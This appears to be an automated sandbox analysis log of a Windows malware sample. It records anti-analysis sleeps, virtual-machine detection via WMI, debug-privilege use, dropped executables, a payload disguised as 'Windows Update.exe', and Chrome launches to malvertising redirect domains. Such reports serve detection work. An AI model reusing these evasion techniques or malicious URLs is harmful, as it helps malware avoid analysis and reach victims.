Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe TID: 6980	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe TID: 5912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe TID: 4536	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe TID: 4536	Thread sleep time: -8640000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe TID: 4536	Thread sleep time: -960000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe TID: 6956	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe TID: 2832	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe TID: 6092	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe TID: 5204	Thread sleep time: -3600000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe TID: 7368	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe TID: 1360	Thread sleep time: -922337203685477s >= -30000s

Found evasive API chain (date check)

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

Evasive API call chain: GetSystemTime,DecisionNodes

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Thread delayed: delay time: 480000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Thread delayed: delay time: 922337203685477

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\postproc-52.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nkn4qhlm.csu\autosubplayer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-IGHFO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\swresample-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1ffxnzir.1cn\random.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-QLPAO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\AForge.Video.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-T1381.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-9KFTG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\avfilter-2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M2F05.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-2J58U.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-685QJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-CUGLT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\avdevice-53.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-O4BO6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M2F05.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-3FQP6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-PVRDV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-L76RD.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Thread delayed: delay time: 480000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Thread delayed: delay time: 922337203685477

Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: chrome.exe, 00000018.00000003.376044571.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395688016.0000018BEE6D9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404837215.0000018BEE6EA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396302527.0000018BEE6EA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: chrome.exe, 00000019.00000002.413066144.0000020F7E59B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: 7((_8888YTR(.exe, 00000003.00000002.323240096.0000000000C3A000.00000004.00000020.sdmp, ZHunuhebaqu.exe, 00000014.00000002.364182317.0000000000A26000.00000004.00000020.sdmp, chrome.exe, 00000019.00000002.413066144.0000020F7E59B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

Code function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

0_2_00409B78

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00452AD4 FindFirstFileA,GetLastError,	1_2_00452AD4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_0046417C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_004645F8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose,	1_2_00462BF0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	1_2_00498FDC
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00475798 FindFirstFileA,FindNextFileA,FindClose,	1_2_00475798

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00450334

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe "C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe "C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513	Jump to behavior
